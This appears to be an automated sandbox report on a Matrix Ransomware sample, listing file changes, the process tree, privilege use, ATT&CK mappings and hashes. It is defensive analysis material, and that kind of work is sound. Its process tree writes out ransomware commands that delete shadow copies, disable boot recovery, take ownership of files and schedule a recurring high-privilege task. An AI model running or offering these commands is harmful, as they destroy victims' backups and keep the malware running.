3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\zh-CN.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\jli.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\mix.gif 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-tools.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\CheckpointSearch.mpe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\luac.luac 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\ro.pak.DATA 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Locales\lv.pak 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\00_musicbrainz.luac 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\vccorlib140.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.147.37\msedgeupdateres_vi.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\unpack200.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\EdgeWebView.dat 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\splash.gif 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.151\goopdateres_hr.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-heapdump.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\cue.luac 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Mozilla Firefox\minidump-analyzer.exe 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\bin\jfr.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\feature.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\currency.data 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\vlc.mo 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\j2pcsc.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_it.properties 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-openide-awt.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-profiling_zh_CN.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\javaws.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\#ANN_README#.rtf 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_ja.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_zh_4.4.0.v20140623020002.jar 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_mmx_plugin.dll 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5836 schtasks.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4092 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 4240 powershell.exe 4240 powershell.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe 5904 LqC3I9JZ64.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 5904 LqC3I9JZ64.exe -
Suspicious use of AdjustPrivilegeToken 49 IoCs
description pid Process Token: SeDebugPrivilege 4240 powershell.exe Token: SeTakeOwnershipPrivilege 1424 takeown.exe Token: SeDebugPrivilege 5904 LqC3I9JZ64.exe Token: SeLoadDriverPrivilege 5904 LqC3I9JZ64.exe Token: SeBackupPrivilege 3624 vssvc.exe Token: SeRestorePrivilege 3624 vssvc.exe Token: SeAuditPrivilege 3624 vssvc.exe Token: SeIncreaseQuotaPrivilege 5620 WMIC.exe Token: SeSecurityPrivilege 5620 WMIC.exe Token: SeTakeOwnershipPrivilege 5620 WMIC.exe Token: SeLoadDriverPrivilege 5620 WMIC.exe Token: SeSystemProfilePrivilege 5620 WMIC.exe Token: SeSystemtimePrivilege 5620 WMIC.exe Token: SeProfSingleProcessPrivilege 5620 WMIC.exe Token: SeIncBasePriorityPrivilege 5620 WMIC.exe Token: SeCreatePagefilePrivilege 5620 WMIC.exe Token: SeBackupPrivilege 5620 WMIC.exe Token: SeRestorePrivilege 5620 WMIC.exe Token: SeShutdownPrivilege 5620 WMIC.exe Token: SeDebugPrivilege 5620 WMIC.exe Token: SeSystemEnvironmentPrivilege 5620 WMIC.exe Token: SeRemoteShutdownPrivilege 5620 WMIC.exe Token: SeUndockPrivilege 5620 WMIC.exe Token: SeManageVolumePrivilege 5620 WMIC.exe Token: 33 5620 WMIC.exe Token: 34 5620 WMIC.exe Token: 35 5620 WMIC.exe Token: 36 5620 WMIC.exe Token: SeIncreaseQuotaPrivilege 5620 WMIC.exe Token: SeSecurityPrivilege 5620 WMIC.exe Token: SeTakeOwnershipPrivilege 5620 WMIC.exe Token: SeLoadDriverPrivilege 5620 WMIC.exe Token: SeSystemProfilePrivilege 5620 WMIC.exe Token: SeSystemtimePrivilege 5620 WMIC.exe Token: SeProfSingleProcessPrivilege 5620 WMIC.exe Token: SeIncBasePriorityPrivilege 5620 WMIC.exe Token: SeCreatePagefilePrivilege 5620 WMIC.exe Token: SeBackupPrivilege 5620 WMIC.exe Token: SeRestorePrivilege 5620 WMIC.exe Token: SeShutdownPrivilege 5620 WMIC.exe Token: SeDebugPrivilege 5620 WMIC.exe Token: SeSystemEnvironmentPrivilege 5620 WMIC.exe Token: SeRemoteShutdownPrivilege 5620 WMIC.exe Token: SeUndockPrivilege 5620 WMIC.exe Token: SeManageVolumePrivilege 5620 WMIC.exe Token: 33 5620 WMIC.exe Token: 34 5620 WMIC.exe Token: 35 5620 WMIC.exe Token: 36 5620 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4396 wrote to memory of 3784 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 84 PID 4396 wrote to memory of 3784 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 84 PID 4396 wrote to memory of 3784 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 84 PID 4396 wrote to memory of 4260 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 86 PID 4396 wrote to memory of 4260 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 86 PID 4396 wrote to memory of 4260 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 86 PID 4396 wrote to memory of 4116 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 90 PID 4396 wrote to memory of 4116 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 90 PID 4396 wrote to memory of 4116 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 90 PID 4116 wrote to memory of 4240 4116 cmd.exe 92 PID 4116 wrote to memory of 4240 4116 cmd.exe 92 PID 4116 wrote to memory of 4240 4116 cmd.exe 92 PID 4396 wrote to memory of 4636 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 93 PID 4396 wrote to memory of 4636 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 93 PID 4396 wrote to memory of 4636 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 93 PID 4396 wrote to memory of 2872 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 95 PID 4396 wrote to memory of 2872 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 95 PID 4396 wrote to memory of 2872 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 95 PID 4636 wrote to memory of 1400 4636 cmd.exe 97 PID 4636 wrote to memory of 1400 4636 cmd.exe 97 PID 4636 wrote to memory of 1400 4636 cmd.exe 97 PID 4636 wrote to memory of 1716 4636 cmd.exe 98 PID 4636 wrote to memory of 1716 4636 cmd.exe 98 PID 4636 wrote to memory of 1716 4636 cmd.exe 98 PID 2872 wrote to memory of 4080 2872 cmd.exe 99 PID 2872 wrote to memory of 4080 2872 cmd.exe 99 PID 2872 wrote to memory of 4080 2872 cmd.exe 99 PID 4636 wrote to memory of 1608 4636 cmd.exe 100 PID 4636 wrote to memory of 1608 4636 cmd.exe 100 PID 4636 wrote to memory of 1608 4636 cmd.exe 100 PID 4396 wrote to memory of 2136 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 101 PID 4396 wrote to memory of 2136 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 101 PID 4396 wrote to memory of 2136 4396 3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe 101 PID 2136 wrote to memory of 4552 2136 cmd.exe 103 PID 2136 wrote to memory of 4552 2136 cmd.exe 103 PID 2136 wrote to memory of 4552 2136 cmd.exe 103 PID 2136 wrote to memory of 1416 2136 cmd.exe 105 PID 2136 wrote to memory of 1416 2136 cmd.exe 105 PID 2136 wrote to memory of 1416 2136 cmd.exe 105 PID 2136 wrote to memory of 1424 2136 cmd.exe 106 PID 2136 wrote to memory of 1424 2136 cmd.exe 106 PID 2136 wrote to memory of 1424 2136 cmd.exe 106 PID 2136 wrote to memory of 1224 2136 cmd.exe 107 PID 2136 wrote to memory of 1224 2136 cmd.exe 107 PID 2136 wrote to memory of 1224 2136 cmd.exe 107 PID 1224 wrote to memory of 692 1224 cmd.exe 108 PID 1224 wrote to memory of 692 1224 cmd.exe 108 PID 1224 wrote to memory of 692 1224 cmd.exe 108 PID 692 wrote to memory of 5904 692 LqC3I9JZ.exe 109 PID 692 wrote to memory of 5904 692 LqC3I9JZ.exe 109 PID 4080 wrote to memory of 5568 4080 wscript.exe 110 PID 4080 wrote to memory of 5568 4080 wscript.exe 110 PID 4080 wrote to memory of 5568 4080 wscript.exe 110 PID 5568 wrote to memory of 5836 5568 cmd.exe 112 PID 5568 wrote to memory of 5836 5568 cmd.exe 112 PID 5568 wrote to memory of 5836 5568 cmd.exe 112 PID 4080 wrote to memory of 5960 4080 wscript.exe 113 PID 4080 wrote to memory of 5960 4080 wscript.exe 113 PID 4080 wrote to memory of 5960 4080 wscript.exe 113 PID 5960 wrote to memory of 1928 5960 cmd.exe 115 PID 5960 wrote to memory of 1928 5960 cmd.exe 115 PID 5960 wrote to memory of 1928 5960 cmd.exe 115 PID 5492 wrote to memory of 4092 5492 cmd.exe 119 PID 5492 wrote to memory of 4092 5492 cmd.exe 119 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4552 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe"C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe"1⤵
- Matrix Ransomware
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\3eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63.exe" "C:\Users\Admin\AppData\Local\Temp\NWDyMrAh.exe"2⤵PID:3784
-
-
C:\Users\Admin\AppData\Local\Temp\NWDyMrAh.exe"C:\Users\Admin\AppData\Local\Temp\NWDyMrAh.exe" -n2⤵
- Executes dropped EXE
PID:4260
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\qbixSRn6.txt"2⤵
- Suspicious use of WriteProcessMemory
PID:4116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4240
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\8XFNKXtw.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\8XFNKXtw.bmp" /f3⤵
- Sets desktop wallpaper using registry
PID:1400
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵PID:1716
-
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵PID:1608
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CnE33OpS.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:2872 -
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\CnE33OpS.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3nfEvclS.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
- Suspicious use of WriteProcessMemory
PID:5568 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\3nfEvclS.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
PID:5836
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
- Suspicious use of WriteProcessMemory
PID:5960 -
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵PID:1928
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xyRbkJVx.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""2⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Views/modifies file attributes
PID:4552
-
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C3⤵PID:1416
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c LqC3I9JZ.exe -accepteula "store.db" -nobanner3⤵
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Users\Admin\AppData\Local\Temp\LqC3I9JZ.exeLqC3I9JZ.exe -accepteula "store.db" -nobanner4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Users\Admin\AppData\Local\Temp\LqC3I9JZ64.exeLqC3I9JZ.exe -accepteula "store.db" -nobanner5⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5904
-
-
-
-
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\3nfEvclS.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:5492 -
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet2⤵
- Interacts with shadow copies
PID:4092
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5620
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No2⤵
- Modifies boot configuration data using bcdedit
PID:3744
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4868
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F2⤵PID:3532
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3624
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
1Hidden Files and Directories
1Indicator Removal
2File Deletion
2Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD5b2d09ca627235e8e390dafb01172dd68
SHA11946ce5c16d7a98ea111d509edcd54297dc3f789
SHA256a245c05d485dd0f93e10609fc3ab350ab1e8cb88f7089a8735e43449af713b8b
SHA512e681e40d81be6950a11a9b3e8dbb074b7b0a193488c2d5011997d7d0cef1fd8bb41e42f806cd009e555f8ca2169340d95a510980e40fd445cf5a925b2b9668e3
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
181KB
MD52f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
221KB
MD53026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
Filesize
3.8MB
MD5ac42a9b2338847bb398152b1bf6401fd
SHA102daf9ff6773da4d134c94fdb7630af2cc01e399
SHA2563eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
SHA512016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
-
Filesize
3.8MB
MD5ac42a9b2338847bb398152b1bf6401fd
SHA102daf9ff6773da4d134c94fdb7630af2cc01e399
SHA2563eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
SHA512016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
-
Filesize
3.8MB
MD5ac42a9b2338847bb398152b1bf6401fd
SHA102daf9ff6773da4d134c94fdb7630af2cc01e399
SHA2563eff2f818a0dac4bd17d8da95962be78bca0b466e4325d2c2fd718ec54668f63
SHA512016c848cf8c2ffc1343d9242eaae19e9d41488f752282787f4f62cb841c121583f7673b21ddd7b624f39ef775c167fd2733eba495c84ebdf20103f09400e0ac1
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
37KB
MD5ac557f20c0778689546cd944762ba740
SHA12081b7cbba20653beb11b9ddd2250b4de79fa71b
SHA25655ea10d81e7775c3733fa8cfda377d898b5c033870083a72a1405209c7152b81
SHA512d1770b44f9136010381c1f93fafd092cb50c0fc80c16a781ecf32ec46aab5012109dd538c428d74b3b340f4aebb2cbd1a42d6dd4177c73d473fa12c150f27e78
-
Filesize
14B
MD58eb51985066cb0782077f624013d47a2
SHA10549d07d51454e73b937946ba1887cacfce71835
SHA2565537d10911f09132033b185344f75ea1a0ed7e5509b3be00bd8bc93d477baa44
SHA512539a7160bb41366a74d8859b080724f5838132428f672c2bba7ef9c9a259823f15074adec75567bea6724f09d681c04b8763a2f495eff3436ff17420cb7bf0f5
-
Filesize
246B
MD5f5a5e7bbf6260715c3d3080cac360820
SHA1196fbbe9f76d411d282ebee2dfbada3205c3b69c
SHA256005c28d79652cf68f5194574c8eb3c99f62d7ea84b8700c2f4bb9f74a3fa5ff1
SHA5124dc966b010f9d2be838c41b4324f9ad27793a1e6ef09b29c5d9ec752b774064d437dac0f4cb78ff1438f6ecd967fe0a2f5376f64c6a1507e496cb672730f5b63
-
Filesize
265B
MD5978bdb091c97c9c0b3b4765bcd378704
SHA1c7e771bf4cce39f82e6f4b78a8a40753a573caaf
SHA256b981a8f3ac84e24930eecba33264d7ad368ecbf0b141e8c20e7faf19eb95db29
SHA5124e1d45d5ebbc5c262ec54f9a8ad7c3c564f3258f94809efb3e1042547e1a402993782b94db4f87f8263b03402993e7d078881f9c9340a0f127a9d628af1b400e
-
Filesize
260B
MD5365338073e5ce38eb6781b5890a09756
SHA195a7166c1c209794218e733c9d3593e94aa16cc6
SHA256981c16209873dcd090f48b21f4484dd13af7ee5daf50e037c1750d5a758dabb2
SHA51219e4d2da003bd42b6ee1bec13e78c190860edc4b9b7d684f50f56b6f737304d88810d10621007e74e746cbb983c4c67b2b2c3c813bf9ebe67c788d20886a570d